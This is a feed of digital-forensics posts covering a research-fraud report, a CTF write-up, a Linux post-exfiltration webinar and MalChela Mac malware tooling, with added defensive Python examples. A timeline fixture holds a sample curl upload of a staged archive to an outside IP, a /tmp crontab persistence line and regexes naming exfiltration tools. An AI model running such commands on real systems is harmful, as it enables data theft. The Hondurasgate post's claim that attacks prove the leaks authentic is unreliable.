"The FoSci Report 2026: Understanding, Detecting, and Documenting Manipulation in the Research Ecosystem"

In this report, 17 authors – among them scholarly sleuths and investigators of science, from academia and industry – come together to present a primer on the field of forensic scientometrics.

https://figshare.com/articles/online_resource/_b_Forensic_Scientometrics_FoSci_Report_2026_b_Understanding_Detecting_and_Documenting_Manipulation_in_the_Research_Ecosystem/32178456?file=64280955

#research #science #scientometrics #forensics #researchFraud

The story of one incident, or why you should not expose 1C to the internet

Hi everyone, this is the JetCSIRT DFIR team! We recently handled a case in which the attackers were detected at an early stage of the attack. They did not get as far as causing impact, but they left plenty of traces, which gave us the chance to study their tactics, techniques and procedures (TTPs) in action. We are ready to tell how it happened and to give recommendations for raising the level of protection.

https://habr.com/ru/companies/jetinfosystems/articles/1035226/

#Ransomware #DFIR #1C #Forensics #information_security #malware #SOC #infosec


Hondurasgate.ch Portal Under Attack

The Hondurasgate.ch portal received 39,618 intrusion attempts in a single day, May 7, 2026, of which 22,620 were concentrated within one hour. The attacks originated mainly from the United States and Israel, matching the two countries named in the leaked audio. Rather than a simple DDoS, the activity aimed at systematic vulnerability probing and surface reconnaissance, concentrating on outdated CMS installers, exposed configuration files, legacy admin panels and exposed repositories. The attack is read as a political message and is seen as indirect evidence acknowledging the authenticity of the leaked material.

https://hondurasgate.ch/investigaciones/hondurasgate-under-attack-us-israel-digital-siege

#cybersecurity #ddos #forensics #politicalattack #telemetry

Our Hondurasgate portal under attack: the scale and geography of the digital siege expose the authenticity of the leaks

39,618 intrusion attempts in 24 hours, with a peak of 22,620 requests in a single hour. Geolocation places the focal points in U.S. and Israeli territory, the two jurisdictions named in the leaked audios as architects of the political return of the convicted ex-president Juan Orlando Hernández.

hondurasgate.ch

Write-up for 2 forensics challenges at THCon : https://cryptax.github.io/thcon2026-breach/

#THcon #CTF #LUKS #forensics

THCon 2026 - Forensics Challenges

Don’t forget to lock. This is the first challenge of the Forensics category. We seized a suspect's computer and managed to capture a RAM dump before it was powered off, along with an encrypted disk. Your objective is to decrypt the drive. We get a chall.tar.gz. Solving the challenge: the tar.gz contains 2 files, an ELF and a raw image:

    drwxr-xr-x aurel/aurel          0 2026-03-09 16:46 files/
    -rw-r--r-- aurel/aurel 1072693248 2026-03-09 16:46 files/disk.


----------------

🎥 Video
===================

Opening: The announcement describes a free webinar titled “Digital Forensics: Basic Linux Analysis After Data Exfiltration — Hackers Arise” scheduled for February 13, 2026. The core narrative emphasizes that intrusions often present as an adversary already resident in an environment rather than beginning with an obvious malware drop.

Technical Details: The event framing indicates a focus on post-exfiltration Linux analysis. Topics implied by the title and tagline include identification of forensic artifacts left after data exfiltration, methods to examine Linux hosts for traces of adversary activity, and investigator-centric techniques for reconstructing actions when initial compromise is not observable. The announcement explicitly centers on the concept that adversaries can be present before any exploit or payload execution.

Analysis: Framing investigations around the “adversary-inside” perspective shifts attention to persistence mechanisms, lateral movement artifacts, evidence of data staging and egress, and gaps in audit/visibility that enable prolonged dwell time. While the announcement does not list IoCs or specific tools, it signals an emphasis on host-level evidence collection and reasoning about timelines and artifact correlation on Linux systems.

Detection: Although the source does not provide detection signatures, the webinar’s scope suggests discussion of detection opportunities such as anomalous outbound connections, unusual file access patterns, unexpected scheduled jobs or services, and forensic indicators in system logs and memory snapshots.

Implications for IR practitioners: The stated narrative reinforces the need to treat post-exfiltration analysis as a distinct investigative discipline with its own priorities—establishing a timeline, locating exfiltration vectors, and validating whether data staging or covert channels were used.
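To make the host-level reasoning above concrete, here is an added example (my own code, not material from the webinar or from Hackers-Arise): a small Python triage that merges constructed auth.log lines, a timestamped bash history and a crontab into one timeline and tags the staging, egress, persistence and unknown-source-login heuristics that the Detection paragraph names. The sample lines, the KNOWN_ADMIN_SOURCES allowlist, the year supplied for syslog timestamps and the rule regexes are all assumptions made for the example, not vetted signatures.

```python
import re
from datetime import datetime, timezone

# Constructed sample artifacts (not real logs); IPs come from documentation ranges.
AUTH_LOG = """\
Feb 13 02:11:07 web01 sshd[2211]: Accepted password for deploy from 203.0.113.45 port 51122 ssh2
Feb 13 02:11:07 web01 sshd[2211]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Feb 13 02:14:52 web01 sudo:   deploy : TTY=pts/1 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/tar czf /tmp/.cache.tgz /var/lib/app/db
"""
# ~/.bash_history as written with HISTTIMEFORMAT set: each '#<epoch>' line dates the command after it.
BASH_HISTORY = """\
#1770948750
ls -la /var/lib/app
#1770949070
curl -s -T /tmp/.cache.tgz https://203.0.113.45/up
#1770949101
(crontab -l; echo '*/30 * * * * /tmp/.cache/sync.sh') | crontab -
"""
CRONTAB = "*/30 * * * * /tmp/.cache/sync.sh\n"

KNOWN_ADMIN_SOURCES = {"198.51.100.10"}      # assumed allowlist of admin jump hosts
TEMP_DIRS = r"(/tmp|/var/tmp|/dev/shm)/"      # world-writable staging locations

# Heuristic rules (assumptions for this example, not vetted signatures): tag -> regex on the text.
RULES = {
    "staging": re.compile(r"\b(tar|zip|7z)\b.*\s" + TEMP_DIRS),
    "egress": re.compile(r"\bcurl\b.*\s-T\s|\bscp\s|\brclone\s|\bwget\b.*--post-file"),
    "persistence": re.compile(r"\bcrontab\s+-(\s*$|e\b)"),
}


def tag(text):
    return [name for name, rx in RULES.items() if rx.search(text)]


def parse_auth_log(text, year):
    events = []
    for line in text.splitlines():
        m = re.match(r"(\w{3}) +(\d+) (\d\d:\d\d:\d\d) (\S+) (.*)", line)
        if not m:
            continue
        # syslog lines carry no year; the investigator supplies it from the image.
        ts = datetime.strptime(f"{year} {m[1]} {m[2]} {m[3]}", "%Y %b %d %H:%M:%S")
        msg = m[5]
        tags = tag(msg)
        login = re.search(r"Accepted \w+ for (\S+) from (\S+)", msg)
        if login and login[2] not in KNOWN_ADMIN_SOURCES:
            tags.append("access-from-unknown-source")
        events.append({"ts": ts.replace(tzinfo=timezone.utc), "source": "auth.log", "text": msg, "tags": tags})
    return events


def parse_bash_history(text, user):
    events, pending = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            pending = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        events.append({"ts": pending, "source": f"{user}:.bash_history", "text": line, "tags": tag(line)})
        pending = None
    return events


def parse_crontab(text, user):
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        tags = ["persistence"] if re.search(TEMP_DIRS, line) else []
        events.append({"ts": None, "source": f"{user}:crontab", "text": line, "tags": tags})
    return events


def build_timeline(auth_log=AUTH_LOG, history=BASH_HISTORY, crontab=CRONTAB, user="deploy", year=2026):
    events = parse_auth_log(auth_log, year) + parse_bash_history(history, user) + parse_crontab(crontab, user)
    undated = datetime.max.replace(tzinfo=timezone.utc)   # a live crontab has no timestamp; sort it last
    events.sort(key=lambda e: e["ts"] or undated)
    for e in events:
        e["ts"] = e["ts"].strftime("%Y-%m-%dT%H:%M:%SZ") if e["ts"] else "(undated)"
    return events


def flagged(events):
    return [e for e in events if e["tags"]]


if __name__ == "__main__":
    for e in build_timeline():
        mark = "  <-- " + ",".join(e["tags"]) if e["tags"] else ""
        print(f'{e["ts"]} {e["source"]:22} {e["text"]}{mark}')
```

Run as a script it prints the merged timeline with the tagged events marked; the interesting design point is that each artifact keeps its own source label, so a correlation such as "archive created under /tmp by sudo, uploaded three minutes later from the same user's shell" is visible without trusting any single log.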

Limitations: The announcement is a webinar summary and does not publish technical IoCs, ATT&CK IDs, or tooling details. Attendees should expect conceptual framing and case-oriented walkthroughs rather than a repository of signatures.

References: Event title and date as published by the organizers: “Digital Forensics: Basic Linux Analysis After Data Exfiltration — Hackers Arise”, Feb 13, 2026.

🔹 #digitalforensics #linux #incidentresponse #dataexfiltration #forensics

🔗 Source: https://hackers-arise.com/digital-forensics-basic-linux-analysis-after-data-exfiltration/

⚠️ Levels of Transparency in OSINT 🔥 https://www.reydes.com/e/Niveles_de_Transparencia_en_OSINT #cybersecurity #hacking #redteam #forensics #dfir #osint
⚠️ Record Everything in OSINT 🔥 https://www.reydes.com/e/Registrar_Todo_en_OSINT #cybersecurity #hacking #redteam #forensics #dfir #osint

MalChela v4.1: Mac Malware Analysis Arrives

MalChela v4.1 is out today, and the headline is something I’ve been wanting to tackle for a while: dedicated Mac malware analysis tooling. If you’ve been following the channel or the blog, you know MalChela started as a triage-first toolkit aimed at the kinds of samples that show up in Windows-centric IR engagements. That coverage was never the full picture. Mac malware — infostealers, adware loaders, APT implants — has become too common to treat as an edge case. v4.1 is the start at addressing that directly.

New Tools: Mac Analysis

Three new tools land in this release, each targeting a different layer of Mac binary analysis. All three are available in the PWA under the Mac Analysis heading, accessible via CLI shortcodes, and included in the release scripts.

codesign_check (cs)

macOS code signatures are one of the first things worth checking on any suspicious binary. codesign_check accepts either an .app bundle or a bare Mach-O and reports signature status (Developer-signed, Ad-hoc, or Unsigned), Bundle ID, Team ID, and entitlement presence — including the get-task-allow flag that marks debug and development builds. It also verifies the _CodeSignature/ and CodeResources directory structure.

Indicators flagged: missing CMS blob, CS_ADHOC flag, absent Team ID, and get-task-allow entitlement. FileMiner now suggests Code Sign Check automatically for all Mach-O files in a scan. (Planned feature: adding a certificate revocation check).

plist_analyzer (pa)

Parses macOS .plist files and .app bundle Info.plist for static malware indicators. This release includes four new detections:

  • LSUIElement / NSUIElement = true — app runs as a hidden background agent with no Dock icon. Both the modern LSUIElement and legacy NSUIElement (integer 1) forms are now detected, covering older macOS malware that used the pre-Sierra key.
  • NSAllowsArbitraryLoads = true — App Transport Security disabled, a classic C2 channel indicator.
  • CFBundleURLTypes with custom URL schemes — flags non-standard scheme registrations used for persistence or inter-process communication.
  • CFBundleSignature = ‘????’ — no creator code set, common in unsigned tools and malware.
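As an added example of the four plist checks listed above (my own code, not MalChela's plist_analyzer), the following Python uses the standard library's plistlib to evaluate a constructed Info.plist that trips every detection, plus a constructed clean one. The bundle contents, the STANDARD_SCHEMES allowlist and the function names are assumptions; note that NSAllowsArbitraryLoads lives inside the NSAppTransportSecurity dictionary rather than at the top level, and that the legacy NSUIElement form is an integer, which is why the truthiness helper accepts both.

```python
import plistlib

# Constructed Info.plist (not from a real app) that exercises every check below.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.helper</string>
  <key>CFBundleSignature</key><string>????</string>
  <key>NSUIElement</key><integer>1</integer>
  <key>NSAppTransportSecurity</key>
  <dict><key>NSAllowsArbitraryLoads</key><true/></dict>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>Helper</string>
      <key>CFBundleURLSchemes</key><array><string>hlpr-cmd</string></array>
    </dict>
  </array>
</dict>
</plist>
"""

# Constructed benign counterpart: visible app, ATS left on, no custom schemes, creator code set.
CLEAN_INFO_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.viewer",
    "CFBundleSignature": "VIEW",
    "LSUIElement": False,
    "CFBundleURLTypes": [{"CFBundleURLSchemes": ["https"]}],
})

STANDARD_SCHEMES = {"http", "https", "file", "mailto", "ftp", "tel", "sms"}   # assumed allowlist


def _truthy(value):
    # Booleans appear as <true/> or, in legacy plists, as integer 1 / string "1".
    return value is True or value == 1 or str(value).strip().lower() in ("1", "true", "yes")


def analyze_plist(data: bytes):
    plist = plistlib.loads(data)
    findings = []
    # 1. Hidden background agent: modern LSUIElement or the pre-Sierra NSUIElement form.
    for key in ("LSUIElement", "NSUIElement"):
        if key in plist and _truthy(plist[key]):
            findings.append(f"{key}=true: app runs without a Dock icon (hidden agent)")
    # 2. App Transport Security disabled; the flag is nested under NSAppTransportSecurity.
    ats = plist.get("NSAppTransportSecurity", {})
    if isinstance(ats, dict) and _truthy(ats.get("NSAllowsArbitraryLoads", False)):
        findings.append("NSAllowsArbitraryLoads=true: ATS disabled, plaintext HTTP permitted")
    # 3. Custom URL scheme registrations (persistence / IPC hooks).
    for entry in plist.get("CFBundleURLTypes", []) or []:
        for scheme in entry.get("CFBundleURLSchemes", []) or []:
            if scheme.lower() not in STANDARD_SCHEMES:
                findings.append(f"CFBundleURLTypes registers custom scheme '{scheme}://'")
    # 4. No creator code set.
    if plist.get("CFBundleSignature") == "????":
        findings.append("CFBundleSignature='????': no creator code set")
    return findings


if __name__ == "__main__":
    for label, blob in (("suspicious", SAMPLE_INFO_PLIST), ("clean", CLEAN_INFO_PLIST)):
        print(label, analyze_plist(blob) or "no findings")
```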

macho_info (mo)

Parses thin and fat/universal Mach-O binaries and reports: architecture, linked libraries, section entropy, symbol status, RPATH entries, __PAGEZERO integrity, and PIE/ASLR flags.

This release also adds deprecated crypto library detection: macho_info now flags linkage against end-of-life OpenSSL libraries (libcrypto.0.9.8, libssl.0.9.8, and variants). There’s no legitimate reason for a modern binary to link these — flag it and investigate further.
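Added example, not macho_info's code: a minimal Python parser for the parts of the Mach-O format these checks depend on. It walks the load commands of thin and fat/universal binaries to collect linked libraries, RPATH entries, the PIE flag and any end-of-life OpenSSL linkage, and it refuses to walk a load command that runs past the declared command area, which is the usual way a crafted sample trips naive parsers. It builds its own constructed universal binary from struct-packed headers so it runs offline; the builder helpers, the constructed library names and the DEPRECATED_LIBS list are assumptions, and section entropy and __PAGEZERO checks are left out.

```python
import struct

MH_MAGIC_64, FAT_MAGIC = 0xFEEDFACF, 0xCAFEBABE
MH_EXECUTE, MH_PIE = 0x2, 0x200000
LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_RPATH = 0xC, 0x80000018, 0x8000001C
CPU_X86_64, CPU_ARM64 = 0x01000007, 0x0100000C
CPU_NAMES = {CPU_X86_64: "x86_64", CPU_ARM64: "arm64"}
DEPRECATED_LIBS = ("libcrypto.0.9.8", "libssl.0.9.8")   # end-of-life OpenSSL names to flag (assumed list)


# --- builders for the constructed sample (fixtures for the example, not part of the analyzer) ---
def _str_cmd(cmd, payload_fmt, payload, text):
    # Load command whose fixed fields are followed by a NUL-terminated string; cmdsize is 8-byte aligned.
    body = struct.pack(payload_fmt, *payload) + text.encode() + b"\0"
    pad = (-(8 + len(body))) % 8
    return struct.pack("<II", cmd, 8 + len(body) + pad) + body + b"\0" * pad


def _load_dylib(path, weak=False):
    # dylib_command: name offset (24), timestamp, current_version, compatibility_version
    return _str_cmd(LC_LOAD_WEAK_DYLIB if weak else LC_LOAD_DYLIB, "<IIII", (24, 2, 0x10000, 0x10000), path)


def _rpath(path):
    return _str_cmd(LC_RPATH, "<I", (12,), path)   # rpath_command: path offset (12)


def build_thin(cputype, flags, cmds):
    body = b"".join(cmds)
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, cputype, 0, MH_EXECUTE, len(cmds), len(body), flags, 0)
    return header + body


def build_fat(slices):
    # fat_header and fat_arch entries are big-endian; slices are page-aligned as the linker lays them out.
    offset, entries, blobs = 4096, [], []
    for cputype, blob in slices:
        entries.append(struct.pack(">iiIII", cputype, 0, offset, len(blob), 12))
        blobs.append((offset, blob))
        offset += (len(blob) + 4095) // 4096 * 4096
    out = bytearray(offset)
    out[:8] = struct.pack(">II", FAT_MAGIC, len(slices))
    out[8:8 + 20 * len(slices)] = b"".join(entries)
    for off, blob in blobs:
        out[off:off + len(blob)] = blob
    return bytes(out)


# --- the parser ---
def parse_thin(data):
    magic, cputype, _, _, ncmds, sizeofcmds, flags, _ = struct.unpack_from("<IiiIIIII", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError(f"unsupported magic {magic:#x}")
    info = {"arch": CPU_NAMES.get(cputype, hex(cputype)), "pie": bool(flags & MH_PIE),
            "libraries": [], "rpaths": [], "deprecated_crypto": []}
    off, end = 32, 32 + sizeofcmds
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("load command runs past the declared command area")   # corrupt or hostile file
        if cmd in (LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_RPATH):
            str_off = struct.unpack_from("<I", data, off + 8)[0]
            if str_off >= cmdsize:
                raise ValueError("string offset outside its load command")
            text = data[off + str_off:off + cmdsize].split(b"\0", 1)[0].decode("utf-8", "replace")
            if cmd == LC_RPATH:
                info["rpaths"].append(text)
            else:
                info["libraries"].append(text)
                if any(name in text for name in DEPRECATED_LIBS):
                    info["deprecated_crypto"].append(text)
        off += cmdsize
    return info


def parse_macho(data):
    # Fat/universal files wrap one thin Mach-O per architecture; return one report per slice.
    if struct.unpack_from(">I", data, 0)[0] == FAT_MAGIC:
        count = struct.unpack_from(">I", data, 4)[0]
        reports = []
        for i in range(count):
            cputype, _, offset, size, _ = struct.unpack_from(">iiIII", data, 8 + 20 * i)
            reports.append(parse_thin(data[offset:offset + size]))
        return reports
    return [parse_thin(data)]


# Constructed universal binary: a non-PIE x86_64 slice linking an EOL libcrypto, and an arm64 PIE slice
# with a weak reference to an EOL libssl.
SAMPLE_FAT = build_fat([
    (CPU_X86_64, build_thin(CPU_X86_64, 0, [_load_dylib("/usr/lib/libSystem.B.dylib"),
                                            _load_dylib("/usr/lib/libcrypto.0.9.8.dylib"),
                                            _rpath("@executable_path/../Frameworks")])),
    (CPU_ARM64, build_thin(CPU_ARM64, MH_PIE, [_load_dylib("/usr/lib/libSystem.B.dylib"),
                                               _load_dylib("@rpath/libssl.0.9.8.dylib", weak=True)])),
])

if __name__ == "__main__":
    for report in parse_macho(SAMPLE_FAT):
        print(report)
```

Each slice of a universal binary is reported separately on purpose: a build can be PIE on one architecture and not the other, and a deprecated library reference can hide in only one slice.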

mStrings — Mac Tuning

Running mStrings against Mach-O binaries previously produced a lot of noise: ObjC runtime stubs, Swift mangled symbols, and Apple system library paths that add volume without adding signal. A new is_objc_swift_noise() filter suppresses these categories:

  • _objc_* runtime stubs
  • @_* import stubs (including @_LSSharedFileList*, which was previously surfacing as false-positive filesystem IOCs)
  • Swift mangled symbols (_$s*, _T0 and swift_* prefixes)
  • Apple system dylib paths under /System/Library/Frameworks/ and /usr/lib/swift/
  • ObjC type encoding strings

Alongside the noise filter, 12 new Mac-specific MITRE detection rules have been added to detections.yaml:

Rule                              Technique
MacLaunchAgentDaemonPersistence   T1543.001
MacLoginItemPersistence           T1547.015
MacShellProfileInjection          T1546.004
MacCronJobPersistence             T1053.003
MacDylibInjection                 T1574.006
MacKeychainAccess                 T1555.001
MacAppleScriptExecution           T1059.002
MacUnixShellExecution             T1059.004
MacPrivilegeEscalation            T1548.004
MacSystemDiscovery                T1082
MacSandboxVMEvasion               T1497.001
MacSensitiveFileAccess            T1005

Mac path extraction also gets a dedicated regex: re_mac_path captures filesystem IOCs in Mac-style paths (.sh, .py, .dylib, .plist, .app, .pkg, .command) under /Users/, /Library/, /tmp/ and related directories.
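Added example, not the project's own is_objc_swift_noise() or re_mac_path: one possible reading of the noise categories and of the Mac path extraction described above, written in Python and run over a constructed list of strings as they might come out of a Mach-O. The pattern details (in particular the ObjC type-encoding heuristic and the directory list) and the sample strings are assumptions.

```python
import re

# One reading of the noise categories from the release notes (patterns are assumptions).
_NOISE_PATTERNS = [
    re.compile(r"^_objc_"),                                        # ObjC runtime stubs
    re.compile(r"^@_"),                                            # import stubs such as @_LSSharedFileList*
    re.compile(r"^(_\$s|\$s|_T0|swift_)"),                         # Swift mangled symbols, swift_ runtime
    re.compile(r"^/System/Library/Frameworks/|^/usr/lib/swift/"),  # Apple system dylib paths
    re.compile(r"^[vcCiIsSlLqQfdBr@#:*^?]+\d+[@:]"),               # ObjC type encodings such as v16@0:8
]

# Mac-style paths ending in the interesting extensions under user, library, temp and app directories.
RE_MAC_PATH = re.compile(
    r"(?:/Users|/Library|/private/tmp|/tmp|/private/var|/var|/Applications|/opt)"
    r"(?:/[\w.\-]+)*?/[\w.\-]+\.(?:sh|py|dylib|plist|app|pkg|command)\b"
)

# Constructed strings, mixing runtime noise with the kind of paths an analyst wants to keep.
SAMPLE_STRINGS = [
    "_objc_msgSend",
    "@_LSSharedFileListInsertItemURL",
    "_$s10Foundation4DataV5countSivg",
    "_T0SS5countSivg",
    "swift_retain",
    "/System/Library/Frameworks/Foundation.framework/Foundation",
    "/usr/lib/swift/libswiftCore.dylib",
    "v16@0:8",
    "/Users/Shared/.cache/update.sh",
    "/Library/LaunchAgents/com.example.agent.plist",
    "Checking for updates",
    "/tmp/launcher.command",
    "/Applications/Utilities/Terminal.app",
]


def is_objc_swift_noise(s):
    """True for strings that add volume but no signal in Mach-O output."""
    return any(p.search(s) for p in _NOISE_PATTERNS)


def filter_strings(strings):
    return [s for s in strings if not is_objc_swift_noise(s)]


def extract_mac_paths(strings):
    """Unique Mac-style filesystem IOCs, sorted, from a list of strings."""
    return sorted({m.group(0) for s in strings for m in RE_MAC_PATH.finditer(s)})


if __name__ == "__main__":
    kept = filter_strings(SAMPLE_STRINGS)
    print(f"{len(SAMPLE_STRINGS) - len(kept)} noise strings suppressed, {len(kept)} kept")
    for path in extract_mac_paths(kept):
        print("path IOC:", path)
```

The suppression is prefix-based on purpose: a user path that merely contains "swift" or "objc" somewhere in the middle must survive, and the path regex is anchored to the directory roots rather than to the extension so that system library paths are not promoted to IOCs.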

FileMiner — Session Persistence

FileMiner scan results now persist across browser close and refresh. Results, the analyzed path, and the set of executed sub-tools survive in localStorage automatically. On each scan, a session.json is also written server-side to saved_output/fileminer/ — or to the active case folder under saved_output/cases/<case>/fileminer/ when Save to Case is checked.

A Load Session button in the FileMiner options bar opens a file browser pre-navigated to the correct session directory. Selecting a session.json restores the full results table and re-populates the path input. Like the previous GUI, FileMiner now tracks tool runs for suggested tools (green indicates a tool report has already been generated).

MalChela v4.1 is available now on GitHub. As I said, this is just the start of the macOS malware support. I’m looking forward to taking this much further.

#DFIR #Forensics #macos #MalChela #Malware

⚠️ How to Document in OSINT 🔥 https://www.reydes.com/e/Como_Documentar_en_OSINT #cybersecurity #hacking #redteam #forensics #dfir #osint